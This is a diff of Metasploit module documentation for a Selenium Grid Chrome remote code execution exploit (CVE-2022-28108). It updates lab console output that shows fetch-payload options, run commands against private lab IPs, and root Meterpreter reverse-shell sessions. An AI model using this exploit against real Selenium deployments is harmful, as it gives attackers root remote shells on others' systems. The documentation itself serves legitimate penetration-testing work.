@@ -56,7 +56,7 @@ Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
5656 ---- --------------- -------- -----------
5757 FETCH_COMMAND WGET yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
5858 FETCH_DELETE true yes Attempt to delete the binary after execution
59- FETCH_FILENAME jcInmtImuA no Name to use on remote system when storing payload; cannot contain spaces or slashes
59+ FETCH_FILENAME OmbNmrIU no Name to use on remote system when storing payload; cannot contain spaces or slashes
6060 FETCH_SRVHOST no Local IP to use for serving payload
6161 FETCH_SRVPORT 8080 yes Local port to use for serving payload
6262 FETCH_URIPATH no Local URI to use for serving payload
@@ -75,16 +75,16 @@ Exploit target:
7575
7676View the full module info with the info, or info -d command.
7777
78- msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4444 ForceExploit=true
78+ msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4444
7979[*] Started reverse TCP handler on 192.168.56.1:4444
8080[*] Running automatic check ("set AutoCheck false" to disable)
81- [+] The target appears to be vulnerable. Version 3.141.59 detected, which is vulnerable
82- [*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:46564 ) at 2024-12-29 12:14:52 +0900
81+ [+] The target appears to be vulnerable. Version 3.141.59 detected, which is vulnerable.
82+ [*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:40990 ) at 2024-12-30 13:33:31 +0900
8383
8484meterpreter > getuid
8585Server username: root
8686meterpreter > sysinfo
87- Computer : 172.17.0.4
87+ Computer : 172.17.0.5
8888OS : Ubuntu 20.04 (Linux 6.8.0-51-generic)
8989Architecture : x64
9090BuildTuple : x86_64-linux-musl
@@ -94,16 +94,16 @@ meterpreter >
9494
9595### selenium/standalone-chrome:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 24.04
9696```
97- msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4447 ForceExploit=true
97+ msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4447
9898[*] Started reverse TCP handler on 192.168.56.1:4444
9999[*] Running automatic check ("set AutoCheck false" to disable)
100- [!] Cannot reliably check exploitability. ForceExploit is enabled, proceeding with exploitation .
101- [*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:59162 ) at 2024-12-29 12:15:49 +0900
100+ [!] The service is running, but could not be validated. Selenium Grid version 4.x detected .
101+ [*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:34888 ) at 2024-12-30 13:34:30 +0900
102102
103103meterpreter > getuid
104104Server username: root
105105meterpreter > sysinfo
106- Computer : 172.17.0.5
106+ Computer : 172.17.0.6
107107OS : Ubuntu 18.04 (Linux 6.8.0-51-generic)
108108Architecture : x64
109109BuildTuple : x86_64-linux-musl
0 commit comments